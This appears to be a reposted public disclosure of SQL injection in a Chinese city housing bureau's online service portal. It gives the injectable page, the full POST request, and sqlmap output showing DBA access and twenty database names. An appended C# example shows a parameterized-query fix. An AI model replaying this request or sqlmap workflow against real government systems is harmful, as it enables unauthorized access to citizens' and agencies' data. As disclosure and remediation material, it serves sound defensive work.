神刀安全网

Vulnerability title: An injection affecting the online service hall of a certain city's Housing and Urban-Rural Development Bureau

Vulnerability details

Disclosure status:

2016-05-18: Details reported to the vendor; awaiting the vendor's response
2016-05-23: The vendor has actively ignored the vulnerability; details are now disclosed to the public

Brief description:

Detailed description:

Entry point:

**.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx

Online service hall:

**.**.**.**/ZiboHuiYuanShenBao/

POST request:

POST /CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: **.**.**.**/CreditPlatform/Pages/PingFenGS/ZongChengBaoGSYear.aspx
X-Forwarded-For: 1..
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------172172203313378
Content-Length: 5589

-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTTARGET"


-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTARGUMENT"


-----------------------------172172203313378
Content-Disposition: form-data; name="__VIEWSTATE"

-----------------------------172172203313378
Content-Disposition: form-data; name="__EVENTVALIDATION"

/wEWCwK1voO+CQK4qt/MCQKplrXzCAKplrHzCAL3xK/fDALSzZfeDAKQmb6wCQLTjv3WAQLTjpG7CQLTjqWADgLTjrnlB1yIj+lapfWeTDgHzAPAK0VrHosQ
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$txtDanweiName"

ABCD1*
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$CBCorp$0"

on
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$btnOK"

??????′¢
-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$dtbPingJiaDate"


-----------------------------172172203313378
Content-Disposition: form-data; name="ctl00$MainContent$yearDrop"

2015
-----------------------------172172203313378--

DBA privileges (sqlmap output):

[02:34:12] [INFO] testing Microsoft SQL Server
[02:34:12] [INFO] confirming Microsoft SQL Server
[02:34:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[02:34:14] [INFO] testing if current user is DBA
current user is DBA: True
[02:34:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[02:34:14] [INFO] fetched data logged to text files under 'C:/Documents and Settings/Administrator/.sqlmap/output/**.**.**.**'

Proof of vulnerability:

20 databases:

available databases [20]:
[*] ArcGisSDE
[*] dxgxzz
[*] EpointFrame8_Monitor
[*] EpointFrame_ZBJS
[*] EpointNetoffice
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] rmgyzz
[*] sde
[*] stzxzz
[*] szhwzz
[*] tempdb
[*] yljzz
[*] ZiBoDaJianGuan
[*] ZiBoDJG_EpointSystemSupport
[*] ZiBoDJG_XZSP
[*] ZiBoZJZ

Remediation:

Separate? Filter.
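As an added example (not code from the original report or from the affected application), the two-part fix the remediation line hints at, read here as separating SQL from data with parameters and filtering the wildcard search input: a C# ASP.NET/SQL Server search over the txtDanweiName and yearDrop form fields, showing the concatenation pattern that permits injection beside the parameterized form. The table and column names (Corp, DanweiName, Score, ReportYear) are assumptions; the report does not show the application's query.

```csharp
// Added example, not code from the original report or the affected site.
// Table/column names (Corp, DanweiName, Score, ReportYear) are assumptions.
using System.Data;
using System.Data.SqlClient;
using System.Text;

public static class CompanySearch
{
    // Vulnerable pattern: the form value is concatenated into the SQL text.
    // A single quote in the input ends the string literal, and whatever follows
    // is executed as SQL by the DBA-level connection seen in the sqlmap output.
    public static string BuildUnsafeSql(string danweiName, string year)
    {
        return "SELECT DanweiName, Score FROM Corp WHERE DanweiName LIKE '"
             + danweiName.Replace('*', '%') + "' AND ReportYear = " + year;
    }

    // Filtering step: the user's '*' wildcard becomes SQL '%'; every other LIKE
    // metacharacter is escaped so it matches literally.
    public static string ToLikePattern(string userInput)
    {
        var sb = new StringBuilder();
        foreach (char c in userInput)
        {
            if (c == '*') sb.Append('%');
            else if ("%_[]\\".IndexOf(c) >= 0) sb.Append('\\').Append(c);
            else sb.Append(c);
        }
        return sb.ToString();
    }

    // Separation step: the statement shape is fixed; values travel as typed
    // parameters and can never be parsed as SQL.
    public static DataTable SearchSafe(SqlConnection conn, string danweiName, int year)
    {
        const string sql =
            "SELECT DanweiName, Score FROM Corp " +
            "WHERE DanweiName LIKE @pattern ESCAPE '\\' AND ReportYear = @year";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@pattern", SqlDbType.NVarChar, 200).Value = ToLikePattern(danweiName);
            cmd.Parameters.Add("@year", SqlDbType.Int).Value = year;
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader()) table.Load(reader);
            return table;
        }
    }
}
```

The sqlmap output above also shows the web application connecting as a DBA; the connection string should use a login limited to the tables this page reads, so that a remaining injection cannot reach the other 19 databases.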

Copyright notice: when reposting, please credit the source: elevensec11@乌云
